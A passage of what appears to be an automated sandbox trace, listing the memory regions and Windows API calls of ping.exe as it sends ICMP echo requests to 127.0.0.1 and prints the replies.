0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3942 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3943 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3944 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3945 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3946 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3947 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3948 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3949 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3950 start_va = 0x7f4f0000 end_va = 0x7f5effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f4f0000" filename = "" Region: id = 3951 start_va = 0x3c0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 3952 start_va = 0x400000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3953 start_va = 0x7f61a000 end_va = 0x7f61cfff entry_point = 0x0 region_type = private name = "private_0x000000007f61a000" filename = "" Region: id = 3954 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 3955 start_va = 0x140000 end_va = 0x142fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 3956 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 3957 start_va = 0x220000 end_va = 0x222fff entry_point = 0x220000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 3958 start_va = 0x440000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3959 start_va = 0x480000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 3960 start_va = 0x7f4ed000 end_va = 0x7f4effff entry_point = 0x0 region_type = private name = "private_0x000000007f4ed000" filename = "" Thread: id = 223 os_tid = 0x9b4 [0086.390] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0086.390] __set_app_type (_Type=0x1) [0086.390] __p__fmode () returned 0x76ea1768 [0086.390] __p__commode () returned 0x76ea176c [0086.390] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0086.390] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0086.390] SetThreadUILanguage (LangId=0x0) returned 0x409 [0086.392] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0086.392] _fileno (_File=0x76ea4c28) returned 1 [0086.392] _get_osfhandle (_FileHandle=1) returned 0x28 [0086.392] GetFileType (hFile=0x28) returned 0x2 [0086.392] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x1df388 | out: lpMode=0x1df388) returned 0 [0086.392] GetLastError () returned 0x6 [0086.392] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x1df2ec, nSize=0x50 | out: lpBuffer="䤐#") returned 0x0 [0086.392] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0086.394] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x1df3a4 | out: phkResult=0x1df3a4*=0x88) returned 0x0 [0086.394] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x1df398, lpData=0x1df3a0, lpcbData=0x1df39c*=0x4 | out: lpType=0x1df398*=0x0, lpData=0x1df3a0*=0x0, lpcbData=0x1df39c*=0x4) returned 0x2 [0086.394] RegCloseKey (hKey=0x88) returned 0x0 [0086.394] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0x1df368*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1df3a4 | out: ppResult=0x1df3a4*=0x23c250*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x238a30*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0086.394] FreeAddrInfoW (pAddrInfo=0x23c250*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x238a30*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0086.394] IcmpCreateFile () returned 0x236b80 [0086.397] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x23c1b0 [0086.397] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x245270 [0086.398] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x1df4a0, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0086.399] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0x1df398, nSize=0x0, Arguments=0x1df394 | out: lpBuffer="竈$ﵨ\x1d┗\x94䰨盪❋") returned 0x14 [0086.399] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0086.399] _fileno (_File=0x76ea4c28) returned 1 [0086.399] _get_osfhandle (_FileHandle=1) returned 0x28 [0086.399] GetFileType (hFile=0x28) returned 0x2 [0086.400] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x1df35c | out: lpMode=0x1df35c) returned 0 [0086.400] GetLastError () returned 0x6 [0086.400] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x1df2c0, nSize=0x50 | out: lpBuffer="\x1d❋") returned 0x0 [0086.400] _fileno (_File=0x76ea4c28) returned 1 [0086.400] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0086.400] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0086.400] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x247b00 [0086.400] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x247b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0086.400] _fileno (_File=0x76ea4c28) returned 1 [0086.400] _write (in: _FileHandle=1, _Buf=0x247b00*, _MaxCharCount=0x14 | out: _Buf=0x247b00*) returned 20 [0086.400] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0086.400] _fileno (_File=0x76ea4c28) returned 1 [0086.400] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0086.400] LocalFree (hMem=0x247b00) returned 0x0 [0086.400] LocalFree (hMem=0x247ac8) returned 0x0 [0086.400] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x1df398, nSize=0x0, Arguments=0x1df394 | out: lpBuffer="竈$ﵨ\x1d▪\x94䰨盪❚") returned 0x18 [0086.400] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0086.400] _fileno (_File=0x76ea4c28) returned 1 [0086.400] _get_osfhandle (_FileHandle=1) returned 0x28 [0086.400] GetFileType (hFile=0x28) returned 0x2 [0086.400] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x1df35c | out: lpMode=0x1df35c) returned 0 [0086.400] GetLastError () returned 0x6 [0086.400] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x1df2c0, nSize=0x50 | out: lpBuffer="\x1d❚") returned 0x0 [0086.400] _fileno (_File=0x76ea4c28) returned 1 [0086.400] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0086.400] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0086.400] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x23c200 [0086.400] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x23c200, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0086.400] _fileno (_File=0x76ea4c28) returned 1 [0086.400] _write (in: _FileHandle=1, _Buf=0x23c200*, _MaxCharCount=0x18 | out: _Buf=0x23c200*) returned 24 [0086.400] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0086.400] _fileno (_File=0x76ea4c28) returned 1 [0086.400] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0086.400] LocalFree (hMem=0x23c200) returned 0x0 [0086.400] LocalFree (hMem=0x247ac8) returned 0x0 [0086.400] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0086.400] IcmpSendEcho2Ex (in: IcmpHandle=0x236b80, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x23c1b0, RequestSize=0x20, RequestOptions=0x1df414, ReplyBuffer=0x245270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x245270) returned 0x1 [0086.401] InetNtopW (in: Family=2, pAddr=0x1df404, pStringBuf=0x1df52c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0086.401] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x1df398, nSize=0x0, Arguments=0x1df394 | out: lpBuffer="笈$ﵨ\x1d⛔\x94䰨盪✣") returned 0x16 [0086.401] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0086.401] _fileno (_File=0x76ea4c28) returned 1 [0086.401] _get_osfhandle (_FileHandle=1) returned 0x28 [0086.401] GetFileType (hFile=0x28) returned 0x2 [0086.401] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x1df35c | out: lpMode=0x1df35c) returned 0 [0086.401] GetLastError () returned 0x6 [0086.401] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x1df2c0, nSize=0x50 | out: lpBuffer="\x1d✣") returned 0x0 [0086.401] _fileno (_File=0x76ea4c28) returned 1 [0086.401] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0086.401] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0086.401] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x247b40 [0086.402] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x247b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0086.402] _fileno (_File=0x76ea4c28) returned 1 [0086.402] _write (in: _FileHandle=1, _Buf=0x247b40*, _MaxCharCount=0x16 | out: _Buf=0x247b40*) returned 22 [0086.402] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0086.402] _fileno (_File=0x76ea4c28) returned 1 [0086.402] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0086.402] LocalFree (hMem=0x247b40) returned 0x0 [0086.402] LocalFree (hMem=0x247b08) returned 0x0 [0086.402] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x1df398, nSize=0x0, Arguments=0x1df394 | out: lpBuffer="笈$ﵨ\x1d⛿\x94䰨盪✼") returned 0x9 [0086.402] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0086.402] _fileno (_File=0x76ea4c28) returned 1 [0086.402] _get_osfhandle (_FileHandle=1) returned 0x28 [0086.402] GetFileType (hFile=0x28) returned 0x2 [0086.402] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x1df35c | out: lpMode=0x1df35c) returned 0 [0086.402] GetLastError () returned 0x6 [0086.402] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x1df2c0, nSize=0x50 | out: lpBuffer="\x1d✼") returned 0x0 [0086.402] _fileno (_File=0x76ea4c28) returned 1 [0086.402] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0086.402] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0086.402] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x238940 [0086.402] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x238940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0086.402] _fileno (_File=0x76ea4c28) returned 1 [0086.402] _write (in: _FileHandle=1, _Buf=0x238940*, _MaxCharCount=0x9 | out: _Buf=0x238940*) returned 9 [0086.402] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0086.402] _fileno (_File=0x76ea4c28) returned 1 [0086.402] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0086.402] LocalFree (hMem=0x238940) returned 0x0 [0086.402] LocalFree (hMem=0x247b08) returned 0x0 [0086.402] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x1df39c, nSize=0x0, Arguments=0x1df398 | out: lpBuffer="笈$ﵨ\x1d➷\x94䰨盪✧") returned 0x9 [0086.402] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0086.402] _fileno (_File=0x76ea4c28) returned 1 [0086.402] _get_osfhandle (_FileHandle=1) returned 0x28 [0086.402] GetFileType (hFile=0x28) returned 0x2 [0086.402] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x1df360 | out: lpMode=0x1df360) returned 0 [0086.402] GetLastError () returned 0x6 [0086.402] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x1df2c4, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0086.402] _fileno (_File=0x76ea4c28) returned 1 [0086.402] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0086.402] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0086.402] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x2389e8 [0086.402] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x2389e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0086.402] _fileno (_File=0x76ea4c28) returned 1 [0086.402] _write (in: _FileHandle=1, _Buf=0x2389e8*, _MaxCharCount=0x9 | out: _Buf=0x2389e8*) returned 9 [0086.402] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0086.402] _fileno (_File=0x76ea4c28) returned 1 [0086.402] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0086.402] LocalFree (hMem=0x2389e8) returned 0x0 [0086.402] LocalFree (hMem=0x247b08) returned 0x0 [0086.402] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x1df398, nSize=0x0, Arguments=0x1df394 | out: lpBuffer="笈$ﵨ\x1d⟘\x94䰨盪✨") returned 0x9 [0086.402] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0086.402] _fileno (_File=0x76ea4c28) returned 1 [0086.403] _get_osfhandle (_FileHandle=1) returned 0x28 [0086.403] GetFileType (hFile=0x28) returned 0x2 [0086.403] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x1df35c | out: lpMode=0x1df35c) returned 0 [0086.403] GetLastError () returned 0x6 [0086.403] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x1df2c0, nSize=0x50 | out: lpBuffer="\x1d✨") returned 0x0 [0086.403] _fileno (_File=0x76ea4c28) returned 1 [0086.403] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0086.403] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0086.403] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x238940 [0086.403] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x238940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0086.403] _fileno (_File=0x76ea4c28) returned 1 [0086.403] _write (in: _FileHandle=1, _Buf=0x238940*, _MaxCharCount=0x9 | out: _Buf=0x238940*) returned 9 [0086.403] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0086.403] _fileno (_File=0x76ea4c28) returned 1 [0086.403] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0086.403] LocalFree (hMem=0x238940) returned 0x0 [0086.403] LocalFree (hMem=0x247b08) returned 0x0 [0086.403] Sleep (dwMilliseconds=0x3e8) [0087.411] IcmpSendEcho2Ex (in: IcmpHandle=0x236b80, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x23c1b0, RequestSize=0x20, RequestOptions=0x1df414, ReplyBuffer=0x245270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x245270) returned 0x1 [0087.412] InetNtopW (in: Family=2, pAddr=0x1df404, pStringBuf=0x1df52c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0087.412] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x1df398, nSize=0x0, Arguments=0x1df394 | out: lpBuffer="羠$ﵨ\x1d⛔\x94䰨盪✣") returned 0x16 [0087.412] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0087.412] _fileno (_File=0x76ea4c28) returned 1 [0087.412] _get_osfhandle (_FileHandle=1) returned 0x28 [0087.412] GetFileType (hFile=0x28) returned 0x2 [0087.412] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x1df35c | out: lpMode=0x1df35c) returned 0 [0087.412] GetLastError () returned 0x6 [0087.412] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x1df2c0, nSize=0x50 | out: lpBuffer="\x1d✣") returned 0x0 [0087.412] _fileno (_File=0x76ea4c28) returned 1 [0087.412] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0087.412] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0087.412] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x247fd8 [0087.413] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x247fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0087.413] _fileno (_File=0x76ea4c28) returned 1 [0087.413] _write (in: _FileHandle=1, _Buf=0x247fd8*, _MaxCharCount=0x16 | out: _Buf=0x247fd8*) returned 22 [0087.413] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0087.413] _fileno (_File=0x76ea4c28) returned 1 [0087.413] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0087.413] LocalFree (hMem=0x247fd8) returned 0x0 [0087.413] LocalFree (hMem=0x247fa0) returned 0x0 [0087.413] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x1df398, nSize=0x0, Arguments=0x1df394 | out: lpBuffer="羠$ﵨ\x1d⛿\x94䰨盪✼") returned 0x9 [0087.413] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0087.413] _fileno (_File=0x76ea4c28) returned 1 [0087.413] _get_osfhandle (_FileHandle=1) returned 0x28 [0087.413] GetFileType (hFile=0x28) returned 0x2 [0087.413] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x1df35c | out: lpMode=0x1df35c) returned 0 [0087.413] GetLastError () returned 0x6 [0087.413] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x1df2c0, nSize=0x50 | out: lpBuffer="\x1d✼") returned 0x0 [0087.413] _fileno (_File=0x76ea4c28) returned 1 [0087.413] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0087.413] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0087.413] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x238a30 [0087.413] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x238a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0087.413] _fileno (_File=0x76ea4c28) returned 1 [0087.413] _write (in: _FileHandle=1, _Buf=0x238a30*, _MaxCharCount=0x9 | out: _Buf=0x238a30*) returned 9 [0087.413] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0087.413] _fileno (_File=0x76ea4c28) returned 1 [0087.413] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0087.413] LocalFree (hMem=0x238a30) returned 0x0 [0087.413] LocalFree (hMem=0x247fa0) returned 0x0 [0087.413] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x1df39c, nSize=0x0, Arguments=0x1df398 | out: lpBuffer="羠$ﵨ\x1d➷\x94䰨盪✧") returned 0x9 [0087.413] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0087.413] _fileno (_File=0x76ea4c28) returned 1 [0087.413] _get_osfhandle (_FileHandle=1) returned 0x28 [0087.413] GetFileType (hFile=0x28) returned 0x2 [0087.413] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x1df360 | out: lpMode=0x1df360) returned 0 [0087.413] GetLastError () returned 0x6 [0087.413] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x1df2c4, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0087.413] _fileno (_File=0x76ea4c28) returned 1 [0087.413] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0087.413] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0087.413] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x2389e8 [0087.413] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x2389e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0087.413] _fileno (_File=0x76ea4c28) returned 1 [0087.413] _write (in: _FileHandle=1, _Buf=0x2389e8*, _MaxCharCount=0x9 | out: _Buf=0x2389e8*) returned 9 [0087.413] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0087.413] _fileno (_File=0x76ea4c28) returned 1 [0087.413] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0087.413] LocalFree (hMem=0x2389e8) returned 0x0 [0087.413] LocalFree (hMem=0x247fa0) returned 0x0 [0087.414] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x1df398, nSize=0x0, Arguments=0x1df394 | out: lpBuffer="羠$ﵨ\x1d⟘\x94䰨盪✨") returned 0x9 [0087.414] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0087.414] _fileno (_File=0x76ea4c28) returned 1 [0087.414] _get_osfhandle (_FileHandle=1) returned 0x28 [0087.414] GetFileType (hFile=0x28) returned 0x2 [0087.414] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x1df35c | out: lpMode=0x1df35c) returned 0 [0087.414] GetLastError () returned 0x6 [0087.414] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x1df2c0, nSize=0x50 | out: lpBuffer="\x1d✨") returned 0x0 [0087.414] _fileno (_File=0x76ea4c28) returned 1 [0087.414] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0087.414] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0087.414] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x238940 [0087.414] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, 